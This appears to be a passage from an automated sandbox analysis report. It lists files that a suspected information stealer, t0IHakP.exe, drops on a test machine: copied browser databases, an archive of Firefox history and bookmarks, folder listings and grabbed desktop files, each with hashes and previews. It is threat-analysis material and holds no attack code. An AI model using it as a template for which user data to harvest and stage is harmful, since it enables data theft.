C:\Users\user\AppData\Local\Temp\tmp1644.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1654.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1684.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1695.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp16F4.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1714.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1715.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp18EB.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp193A.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	152621
Entropy (8bit):	7.930871657847797
Encrypted:	false
SSDEEP:	3072:26yVgDMg5Ba3tiuNwnbpxCna8cXQrk9L07tdL795p0AC+hG7sgA4uFRWvXzzH7bo:QVgDt5BKDNwnbpxyDcXQrksdLJrq2WvI
MD5:	CC8D598348C627169B0C9C17DF24C1EB
SHA1:	0FC41CBCE5FCC48CF3182ADD3C0377A0F4CCBBB6
SHA-256:	4B04518802AC8A86C8C90EC8D0599CCD99F35F318B9F8F9F8420030ADA9CACEB
SHA-512:	9C627DB4473DB2EF94583CFF01D7A31512D43FB74B815374FC920C1DE92CB40B127AF2F16B9440430D085B8CEEA43CE0A99E1CE936FC804845E86B72505DC140
Malicious:	false
Preview:	PK..........Y................Browsers\Edge\PK..........Y................Browsers\Google\PK.........4.YQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK.........4.Yc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.3''QA..L#.....J_...\/.".._........_....1M_S....PK.........4.Ya...<...5.......Directories\Desktop.txteR.n.0.<S...K...vHl....G,....B$*5._LjB...:.3;.Is9\|......s....".%.\.T..a.U.Hx@3.Z.....>B%....e....2...y..Ja!...-..nm....F..r..+..yZ.....ke...9g...0..Lq..s'.%.N..QsUQ.[_.4j~.3......TFr..$ ..........84.l.s......n-.I.$2.. )n.c.dk..m2.n9N.AZ.!t..+..........rm....-..j...iD.0...H..........A.@........PK.........4.Y...NZ...S.......Directories\Documents.txteR.r. .\|ng....^.......D...m......b4.......s......y<<=>...1.B......G.;DK"I.E@.z. ..&q....1k.h...(N..Z.d...c2...%.j.>.9..8......19.YJ..~..Q.Ha......n../.?.qX..Q..."U....V./.6....3..]}....>_..q.e....G9.

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	821
Entropy (8bit):	5.229734084208519
Encrypted:	false
SSDEEP:	24:bMXGn/RUpJYhosgZoy0GCLYqedPI1BB3/b/CwYLoWB8on:4X2RU0hodGy0/YqedPItTeLoWB8on
MD5:	C390A87450C046F75A1E65FEF97DC1F1
SHA1:	1426E1223194FC7B8C27DCEEE2C247A71AF8FDCA
SHA-256:	FC9CFEF981A822523642F9E260948056583748A6D4FE11960C3B8D6070BAD99E
SHA-512:	8B59827789105660C13C2EB9763DD1EE868B85346A8ED6B4E7138A2432BFD2AC0CF817B092D4C7B229B935451E991F1CAEDFB1F3F75DDD090F2472685216588E
Malicious:	false
Preview:	Desktop\...AIXACVYBSB\...DVWHKMNFNN\...IVHSHTCODI\....AFWAAFRXKO.png....FACWLRWHGG.pdf....IVHSHTCODI.docx....PSAMNLJHZW.jpg....XQACHMZIHU.xlsx....ZSSZYEFYMU.mp3...JDSOXXXWOA\....FACWLRWHGG.mp3....IVHSHTCODI.xlsx....JDSOXXXWOA.docx....MQAWXUYAIK.png....TTCBKWZYOC.pdf....XQACHMZIHU.jpg...PSAMNLJHZW\...QVTVNIBKSD\...WUTJSCBCFX\...XQACHMZIHU\....AFWAAFRXKO.pdf....NHPKIZUUSG.jpg....QVTVNIBKSD.xlsx....UMMBDNEQBN.mp3....XQACHMZIHU.docx....XZXHAVGRAG.png...XZXHAVGRAG\...AFWAAFRXKO.pdf...AFWAAFRXKO.png...desktop.ini...Excel.lnk...FACWLRWHGG.mp3...FACWLRWHGG.pdf...i8Vwc7iOaG.exe...IVHSHTCODI.docx...IVHSHTCODI.xlsx...JDSOXXXWOA.docx...MQAWXUYAIK.png...NHPKIZUUSG.jpg...PSAMNLJHZW.jpg...QVTVNIBKSD.xlsx...TTCBKWZYOC.pdf...UMMBDNEQBN.mp3...XQACHMZIHU.docx...XQACHMZIHU.jpg...XQACHMZIHU.xlsx...XZXHAVGRAG.png...ZSSZYEFYMU.mp3..

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	851
Entropy (8bit):	5.27696941665187
Encrypted:	false
SSDEEP:	24:n+DXGuzWB2pJYhouUFYgZoy0GCtYqee+/BB3/b/CwYLoWB8on:n+DXQB20hol7Gy0JYqee+rTeLoWB8on
MD5:	F7B152C153E856BAA235A6763102AA2C
SHA1:	3FF2E79E66266BAA3FAFE39A6B73DD1BBE3461F8
SHA-256:	36892F8F65420B60AA375FE9F950F8E4E8CD2AC39B03EEEAC205E55D1C6A1663
SHA-512:	A6DA1D6984872B36563D682D5AAF729FA6F03509BE71DAB78FB8EA909A671516A1B21B80F1B0999665BD27F874C88529BCF9F7D0BABE95579D9CFC4372EA5871
Malicious:	false
Preview:	Documents\...DTBZGIOOSO\...DVWHKMNFNN\...IVHSHTCODI\....FACWLRWHGG.pdf....IVHSHTCODI.docx....NHPKIZUUSG.mp3....PSAMNLJHZW.jpg....TQDGENUHWP.png....XQACHMZIHU.xlsx...JDSOXXXWOA\....FACWLRWHGG.mp3....IVHSHTCODI.xlsx....JDSOXXXWOA.docx....MQAWXUYAIK.png....TTCBKWZYOC.pdf....XQACHMZIHU.jpg...My Music\...My Pictures\...My Videos\...ONBQCLYSPU\...PSAMNLJHZW\...QVTVNIBKSD\...WUTJSCBCFX\...XQACHMZIHU\....AFWAAFRXKO.pdf....NHPKIZUUSG.jpg....QVTVNIBKSD.xlsx....UMMBDNEQBN.mp3....XQACHMZIHU.docx....XZXHAVGRAG.png...AFWAAFRXKO.pdf...AFWAAFRXKO.png...desktop.ini...FACWLRWHGG.mp3...FACWLRWHGG.pdf...FIJECAEHJJ.exe...IVHSHTCODI.docx...IVHSHTCODI.xlsx...JDSOXXXWOA.docx...MQAWXUYAIK.png...NHPKIZUUSG.jpg...PSAMNLJHZW.jpg...QVTVNIBKSD.xlsx...TTCBKWZYOC.pdf...UMMBDNEQBN.mp3...XQACHMZIHU.docx...XQACHMZIHU.jpg...XQACHMZIHU.xlsx...XZXHAVGRAG.png...ZSSZYEFYMU.mp3..

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.267729645972274
Encrypted:	false
SSDEEP:	6:3tLykiLPBLKhCMXjBwJcg2RIuK2OFtGu2l/KhGu24oJ0/gij76iT/WrHhpSoKU27:dykibBLKhCMjBwWgOIuK2OF45l/KM545
MD5:	A0E0441194917CE08C66BCB3CFE9D72A
SHA1:	BA82A13B53743925360AE5494DFE7A201FECA1F7
SHA-256:	ABB8799D83F4E1171AF4F20BCDDFE584EABCB5C364F2F50395CE26F5870190E6
SHA-512:	37155DC01529BBDC58F3BB15BF49703082A52C9201A33BF4FDC3230C112BB9B8F89F3CA04DAADCC02EDD4AF16CEB916AE1E75FB0EFF1E065259A888D6C6FD9DD
Malicious:	false
Preview:	Downloads\...AFWAAFRXKO.pdf...desktop.ini...FACWLRWHGG.mp3...IVHSHTCODI.xlsx...JDSOXXXWOA.docx...MNULNCRIYC.jpg...MQAWXUYAIK.png...MQAWXUYAIK.xlsx...NHPKIZUUSG.jpg...NHPKIZUUSG.mp3...QVTVNIBKSD.pdf...QVTVNIBKSD.xlsx...TQDGENUHWP.png...TTCBKWZYOC.docx...TTCBKWZYOC.pdf...UMMBDNEQBN.mp3...XQACHMZIHU.docx...XQACHMZIHU.jpg...XZXHAVGRAG.png..

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4900
Entropy (8bit):	5.165334167149946
Encrypted:	false
SSDEEP:	96:9k5m2iCKcwGT+jDM9Zw72fSASbSbdbsuEMnI0kjMC1GA93L4UNzBehn5nmSCrKty:9qmdYfa2fSASOpgu9nI0kjMC1GA9xbe6
MD5:	10609961D8539846FEA20A7FF7D3F7A7
SHA1:	2C5E1013F38B55540504BA95A1EC1F5F5357EE79
SHA-256:	B6BAB3D574C6669908959D03CC3633719E901DFCB96FC36B4395DF3502A60B17
SHA-512:	308326884D5007BBBD8B3A156C0BBE7FF941324C3B455B3839762465F768438DB26C69E511D2AB18C4226452ABB9189945565E3EE2BFF6E2C5BDA8D20D63DB38
Malicious:	false
Preview:	Temp\...1022088001\....52ba7a538c.exe...1022129001\....5fe60d6c80.exe...1022472001\....ukX1YE2.exe...1022773001\....k0ukcEH.exe...1022819001\....hmUaBuJ.exe...1023073001\....t0IHakP.exe...1023276001\....UfEglUg.exe...44111dbc49\....axplong.exe...abc3bc1985\....skotes.exe...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-42-624.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-55-956.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696428505298658900_7B05BF2A-C74F-44F8-B674-AA3F9719008B.log.....App1696428527628431800_6CD9E3BB-4D03-46BD-8615-75A902267162.log.....App1696428537364279100_A2018481-B961-46B4-9328-34939DEAF293.log.....App1696428537364768600_A2018481-B961-46B4-9328-34939DEAF293.log...edge_BITS_6440_1090636871\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_64

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AFWAAFRXKO.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	true
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
